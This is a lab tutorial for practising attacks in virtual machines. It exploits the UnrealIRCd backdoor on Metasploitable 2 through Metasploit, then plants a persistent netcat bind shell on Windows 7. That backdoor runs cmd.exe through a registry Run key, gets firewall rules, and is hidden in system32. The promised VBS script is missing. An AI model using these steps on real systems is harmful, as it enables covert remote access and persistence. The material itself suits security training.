METASPLOIT TUTORIAL

Intro:
metasploitable linux https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
Metasploitable 2 : Login information : msfadmin//msfadmin
Kali Linux: Login information: root//toor

1. Do ifconfig:msfadmin@metasploitable:~$ ifconfig

*VUL_IP is shown in the red box

2. Scan ports to see if port 6667 is open and running irc using nmap VUL_IP
3. Launch Metasploit framework:
Go to: apps >>> kali linux >>> Top 10 security tools >>> metasploit framework
Or, from terminal, type: msfconsole

4. Select exploit: (LHOST = attacker, RHOST = victim)

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor

msf exploit(unreal_ircd_3281_backdoor) > set LHOST KALI’s_IP
msf exploit(unreal_ircd_3281_backdoor) > set RHOST VUL_IP
msf exploit(unreal_ircd_3281_backdoor) > exploit

5. If everything’s set up properly, you now have a shell.

- Do ls, pwd, cd, etc, etc

When you don’t know what services are exploitable:

1. Use db_nmap:

msf > db_nmap –v –sV VUL_IP

2. Check available services for that IP:

msf > services

3. Search exploits for specific services:

msf > search SERVICE_NAME

4. Choose an exploit for that service you chose, then exploit it:

msf > use exploit/…

msf > exploit (DON’T FORGET TO SELECT RHOST AND LHOST BEFOREHAND)
5. Other things:
Show payloads for exploit, and select one:

msf > show payloads

msf > use payload smb/…

Check options: msf > show options

Netcat backdoor for Windows 7 (for local LAN)

Tools you need:

- Windows 7 vm (IEUser//Passw0rd!)
- Kali Linux (root//toor)
- Netcat https://joncraton.org/blog/46/netcat-for-windows/
- Process Explorer https://technet.microsoft.com/en-us/sysinternals/processexplorer.aspx
- TCPview https://technet.microsoft.com/en-us/sysinternals/tcpview.aspx

Step 1: Have nc.exe in the system32 folder

- Put nc.exe in “C:\windows\system32” folder. (This is done to hide the nc.exe program)

NOTE: Steps 2-4 must be done on cmd using admin privilege and must be typed in manually.
Copy/pasting does not work even when the line is identical.

Step 2: Modifying registry settings so nc.exe automatically starts after reboot

- reg add “HKLM\software\microsoft\windows\currentversion\run” /f /v “system” /t REG_SZ /d

“C:\windows\system32\nc.exe –Ldp 449 –e cmd.exe”

Step 3: Allowing UDP on a port (port 449 in this case)

- netsh advfirewall firewall add rule name=”Nc 449” dir=in action=allow protocol=UDP
localport=449

Step 4: Allowing netcat to run through firewall.

- netsh advfirewall firewall add rule name=”Allow messenger” dir=in action=allow

program=”C:\windows\system32\nc.exe”

Everything is now setup, but we don’t want to wait for the user to restart the computer before netcat
starts, thus we create a visual basic script to run netcat right away
Step 5: Creating vbs script to run netcat instantly.

- Open notepad and write the following code, then save it as a .vbs file

You can now use process explorer to verify that netcat is running. The process is called nc.exe.

Step 6: Getting the ipaddress.

- Use the command ipconfig to view the ip address of the machine (IPv4 Address in this case).

Step 7: Connecting to the backdoor on kali linux.

- In the kali terminal use the following command:

nc –v address port

*Where address is the ip address from Step 6 and port is 449.

If everything worked properly, you should be connected to the target computer and have a cmd prompt
open on kali for the target computer.

If somebody was to view process manager while netcat was connected, they would see cmd.exe running
under the nc.exe process.

In addition, TCPview can be used to find additional information about the netcat instance and what ip
the target is connected to.

If the netcat process was killed manually killed by the user, or crashed for some reason it does not
automatically restart. It only restarts when the computer reboots. As such, trying to connect while the
nc.exe is not running on the target throws an error.